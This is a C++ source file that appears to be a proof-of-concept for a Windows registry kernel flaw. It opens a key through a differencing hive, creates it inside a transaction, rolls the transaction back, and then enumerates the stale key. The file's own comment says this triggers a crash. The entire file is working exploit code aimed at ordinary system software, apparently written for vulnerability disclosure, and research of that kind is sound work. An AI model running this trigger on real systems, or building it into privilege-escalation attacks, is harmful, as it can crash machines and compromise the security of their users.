#define WIN32_NO_STATUS
#include <Windows.h>
#undef WIN32_NO_STATUS
#include <winternl.h>
#include <ntstatus.h>
#include <ktmw32.h>

#include <cstdio>

#pragma comment(lib, "ktmw32")
#pragma comment(lib, "ntdll")

extern "C" {

NTSTATUS NTAPI NtOpenKey(PHKEY, ACCESS_MASK, POBJECT_ATTRIBUTES);

}  // extern "C"

int main() {
  HKEY hHiveList, hLayeredKey;
  WCHAR wchValueName[200];
  DWORD cchValueName;
  LSTATUS st;
  NTSTATUS Status;

  //
  // Find a differencing hive pointing at HKCU.
  //

  st = RegOpenKeyExW(HKEY_LOCAL_MACHINE,
                     L"SYSTEM\\CurrentControlSet\\Control\\hivelist",
                     0,
                     KEY_READ,
                     &hHiveList);

  if (st != ERROR_SUCCESS) {
    printf("RegOpenKeyExW failed with error %d\n", st);
    return 1;
  }

  for (DWORD dwIndex = 0;; dwIndex++) {
    cchValueName = sizeof(wchValueName) / sizeof(WCHAR);

    st = RegEnumValueW(hHiveList,
                       dwIndex,
                       wchValueName,
                       &cchValueName,
                       NULL,
                       NULL,
                       NULL,
                       NULL);

    if (st != ERROR_SUCCESS) {
      printf("RegEnumValueW failed with error %d\n", st);
      return 1;
    }

    if (!_wcsnicmp(wchValueName, L"\\REGISTRY\\WC\\Silo", 17) &&
        !_wcsicmp(&wchValueName[cchValueName - 8], L"user_sid")) {
      break;
    }
  }

  RegCloseKey(hHiveList);

  //
  // Create a HKCU\Test key within a transaction.
  //

  HANDLE hTrans = CreateTransaction(NULL, NULL, 0, 0, 0, 0, NULL);
  if (hTrans == INVALID_HANDLE_VALUE) {
    printf("CreateTransaction failed with error %u\n", GetLastError());
    return 1;
  }

  HKEY hTestKey;
  st = RegCreateKeyTransactedW(HKEY_CURRENT_USER,
                               L"Test",
                               0,
                               NULL,
                               REG_OPTION_VOLATILE,
                               KEY_ALL_ACCESS,
                               NULL,
                               &hTestKey,
                               NULL,
                               hTrans,
                               NULL);

  if (st != ERROR_SUCCESS) {
    printf("RegCreateKeyTransactedW failed with error %d\n", st);
    return 1;
  }

  //
  // Open the transacted test key through the differencing hive.
  //

  wcsncat_s(wchValueName, L"\\Test", 14);

  UNICODE_STRING LayeredKeyPath;
  RtlInitUnicodeString(&LayeredKeyPath, wchValueName);

  OBJECT_ATTRIBUTES ObjectAttributes;
  InitializeObjectAttributes(&ObjectAttributes, &LayeredKeyPath, 0, NULL, NULL);

  Status = NtOpenKey(&hLayeredKey, KEY_READ, &ObjectAttributes);

  if (!NT_SUCCESS(Status)) {
    printf("NtOpenKey failed with error %x\n", Status);
    return 1;
  }

  //
  // Abort the transaction.
  //

  if (!RollbackTransaction(hTrans)) {
    printf("RollbackTransaction failed with error %u\n", GetLastError());
    return 1;
  }

  RegCloseKey(hTestKey);
  CloseHandle(hTrans);

  //
  // Try to enumerate values of the rolled back key, leading to a crash.
  //

  cchValueName = sizeof(wchValueName) / sizeof(WCHAR);

  st = RegEnumValueW(hLayeredKey,
                     0,
                     wchValueName,
                     &cchValueName,
                     NULL,
                     NULL,
                     NULL,
                     NULL);

  if (st != ERROR_SUCCESS) {
    printf("RegEnumValueW failed with error %d\n", st);
    return 1;
  }

  RegCloseKey(hLayeredKey);

  return 0;
}
